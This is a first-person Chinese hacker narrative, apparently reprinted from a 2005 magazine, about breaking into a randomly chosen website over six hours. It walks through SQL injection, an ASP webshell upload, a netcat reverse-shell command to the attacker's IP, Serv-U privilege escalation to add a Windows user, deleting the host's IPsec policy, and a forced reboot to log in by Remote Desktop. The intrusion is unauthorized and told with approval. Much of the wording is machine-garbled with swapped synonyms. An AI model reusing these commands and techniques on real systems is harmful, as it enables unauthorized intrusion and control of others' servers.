一次艰苦的6个小时的渗透过程
作者:Kevin1986 http://hididi.net/public/Kevin/
注意:本文已发表在《黑客X档案》2005年第二期上。转载请注明出处
-------------------------------------------------------------------------------------------------------------
一次费力的6个小时的渗透历程
这些天总以为闷的慌,想到自己好久好久没有在实战中实习渗透了。于是到网上任意找了一个站点,深吸一口吻:渗透开始了。
一边拿着SUPERSCAN扫描端口,一边在站点上转转,发现几个SQL注入的漏洞,是MSSQL的数据库却是都无法成功,大约是ASP的写法和我所使用的注入语句不一样吧,于是我把NBSI2祭了出来,左右扫了一下,发现几个没有发现的注入点,猜解之后不出我所料的是DB_OWNER用户,没什么权限,接着猜解,发现一个MANAGE_USER的表,得到了几个办理员用户.然后顺手在网址后面加个Admin,竟然跳出了后台办理.于是写上破解的用户名和暗码就登入成功了.一切看起来都是那么顺利和自然.这时候SuperScan的扫描效果出来了,只开了个80端口.预计是做了TCP/IP筛选。这个好解决,呵呵。
在后台转转,一眼就看到了一个上传文件的页面,试一下上传一个ASP步伐吧.等了几秒种,竟然提示成功了!一会儿时间楞是没晃过神儿来。
这个时候我内心琢磨着这站点太容易进了吧,再渗透下去大约就没什么意思了,索性放弃去找另外的机器练手.但是当我欣赏一下这个站点的C盘的时候发现办理员竟然做了权限设置,(图1).嘿嘿~我内心想着这站点好玩,有点想拿下他的意思.
在ASP木马里欣赏了一下,发现这台主机的设置还是比力失常的:C盘D盘E盘都没有办法欣赏,F盘是存放网页的地方,设置的权限看起来像EVERYONE,再细致看了一下,办理员禁止了WSH,看来执行文件应该有点贫苦了。不外最少还有一点让我感到光荣的便是有FSO和一个盘可以用用,自我感觉还是蛮不错的。
如今有了WEBSHELL,我就开始提升权限,本来计划是想用海阳2005的搜刮功效在F盘下面搜刮SQL的用户和暗码的,可是找到了几个站点的Conn.asp文件,发现原来SQL并不连接在本机上,而是远程主机,再说都不是SYSADMIN的用户,拿到了也没什么用处。哎,这么拽,想提升权限都贫苦啊。再试了试SHELL.APPLICATION,发现步伐是能够执行的,可是不克不及加参数也不克不及回显效果,似乎就没有什么用了.后来才明确这么一个弱知的想法害我走了不少弯路.
渗透到这里我感觉有点贫苦了,于是到QQ上叫了lcx和他讨论解决办法,Lcx简单的相识到了主机的设置当前,很简单的说了告诉我写个批处置惩罚就能执行带参数的下令了,至于效果,用定向符输出到F:\下的文件里去就可以了.看到这里,我一拍脑门:绝啊,我怎么没想到呢?
起首用海阳2005ASP木马在F:\下建立一个BAT文件.想想再怎么也最少要看一下体系的用户吧.于是写上NET USER >> F:\A.TXT
然后用SHELL.APPLICATION执行一下,再回到FSO页面刷新一下,诶?怎么没有天生A.TXT?大约是办理员设置了USERS的帐户不克不及访问CMD.EXE吧.于是我从自己的机器上上传了一个CMD.EXE到F:\下面然后写上f:\cmd.exe /c net user >>f:\a.txt.执行以效果然在F:\盘下多了一个A.TXT,看来我的料想没有错.看一下,办理员用策略组把用户改的BT级了,没办法,再看下开了什么端口,发现主机除了开了80端口以外还开了21和3389,令人瞠目的是这个21端口下面竟然还有人连接?不会吧?我怎么什么都没扫到?于是试着登入FTP,效果拒绝连接。怪了。
正面不可我干脆反着来,就算你做了TCP/IP筛选你也是对本机做的,对外连接你不可吧。恩,传了个NC上去,然后修改谁人BAT文件:f:\nc.exe myip 1986 -e f:\cmd.exe,执行了当前我就做在电脑前等这个反向连接过来的SHELL,可是等了半天NC的监听端口上什么反映都没有。靠!岂非是传说中的硬件防火墙?
这下似乎没辙了。无奈之下看了看端口列表,发现127.0.0.1这个端口对应着43958端口(图2)。恩?这个不是SERV-U的本地办理端口吗?恰妙手上有个SERVU的权限提升工具,一样传上去简单的执行一句添加NT用户的下令,再看一下,果然添加成功。不错。那么如今我来看看那几个被设置权限的盘吧。颠末几次的执行,效果再次摧毁了我的意志,办理员把SYSTEM用户也给禁止了,试了试CACLS,还是不可。真郁闷。如今权限是有了,但是没有端口。没有其他什么东西可以给我控制,真是欲哭无泪。
这个时候LCX给我了提示说可以用VIDC反连过来大约是HACKER'S DOOR这样的后门.折腾了半天终于把东西传上去执行了,可是根本成功,VIDC连不了,HACKER'S DOOR更是没办法成功.好家伙,真是个难搞的种子啊,玩了两年半安全第一次碰到这么BT的主机。真的有点想放弃了。一看时间,已往4个多小时,除了权限能提升一点以外其他的都毫无希望,还是细致的看一下这个F盘上还有什么好东西吧。
带着点绝望的色彩,我翻开一个又一个的目录,可是便是这样百无聊赖的寻找,还真给我找到一个好东西。主机上竟然有个“农贸服务器安全配置.ipsec”。这个IPSEC文件是什么,岂非是IP安全策略文件?这台主机不会是用的IP策略吧。想想也是蛮有可能的,匆忙将这个文件下载到本地,在MMC.EXE添加一个办理单元,再添加一个IP安全策略,把这个文件导入:哈!果然不出我所了,一个叫“公司”的安全策略呈现了(图3),接着一层层的翻开他,发现做的真是BT,让我大饱了眼福啊,从SYN到ICMP都做了过滤了。学了不少东西。呵呵
研讨了一下这个文件,我就开始料想是不是对方的主机上也指派着这样一个安全策略呢?把他删除了,那么这台主机对着我便是在网络上裸奔了。呵呵。赶紧在本机上安置了一个Windows 200 Resource Kit,然后把其中的IPSECPOL.EXE、IPSECUTIL.DLL 、TEXT2POL.DLL提取出来传到这台主机上。这3个文件是在下令行下操纵IPSEC的工具,我们只用它来删除这个安全指派。再编辑一次BAT文件用SERV-U的权限提升工具执行这条下令:ipsecpol -w REG -p "公司" -o ,要是不出以外的话这个名为“公司”的安全策略曾经被删除掉了。那么如今唯一要做的工作便是重新启动体系,然后从终端服务登入上去。哈!越想越开心,最后编辑一次谁人BAT文件,用IISRESET /REBOOT下令,然后执行。过了不多久网页就没办法访问了,看来是重启了。愉快ing。
颠末短暂而又漫长的等待之后,在键盘的F5键的不断震动下,IE慢悠悠的前往了站点的首页,这个时候我再用终端连接上去,哇哈~成功了(图4),我差点就从椅子上蹦起来。使用适才添加的帐户登入,看了看主机的大抵情况,发现除了F盘,别的的盘都设置只能由Administrator这个用户访问。真BT啊,这次渗透简直让我相识了不少东西,好比这个IPSEC设置,虽然是BT中的BT,但是办理员唯一的错误便是把这个文件给备份到了一个拥有Everyone权限的盘上,呵呵。不晓得是粗心还是什么,简直是他的失策啊。6个小时的入侵就这么竣事了,想想起来真是回味无量,至于当前的事变,预计我在这么BT的办理员部下活不了多长时间,还是就此撒手比力合得来,呵呵。
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
